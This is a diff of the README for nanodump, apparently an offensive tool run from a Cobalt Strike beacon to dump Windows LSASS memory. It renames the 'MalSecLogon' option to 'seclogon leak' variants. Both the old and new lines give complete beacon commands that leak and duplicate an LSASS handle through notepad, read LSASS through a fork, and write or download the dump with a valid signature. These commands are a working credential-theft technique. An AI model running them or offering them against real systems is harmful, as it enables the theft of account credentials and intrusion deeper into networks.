fortra/nanodump/README.md

 beacon> nanodump --fork --write C:\lsass.dmp
 ```

-Use MalSecLogon to leak an LSASS handle in a notepad process, duplicate that handle to get access to LSASS, then read it indirectly by creating a fork and download the dump  with a valid signature:
+Use the seclogon leak remote to leak an LSASS handle in a notepad process, duplicate that handle to get access to LSASS, then read it indirectly by creating a fork and download the dump  with a valid signature:
 ```
-beacon> nanodump --malseclogon --dup --fork --binary C:\Windows\notepad.exe --valid
+beacon> nanodump --seclogon-leak-remote C:\Windows\notepad.exe --fork --valid
 ```

-Get a handle with MalSecLogon, read LSASS indirectly by using a fork and write the dump to disk with a valid signature (a nanodump binary will be uploaded!):
+Get a handle with seclogon leak local, read LSASS indirectly by using a fork and write the dump to disk with a valid signature (a nanodump binary will be uploaded!):
 ```
-beacon> nanodump --malseclogon --fork --valid --write C:\Windows\Temp\lsass.dmp
+beacon> nanodump --seclogon-leak-local --fork --valid --write C:\Windows\Temp\lsass.dmp
 ```

 Download the dump with an invalid signature (default):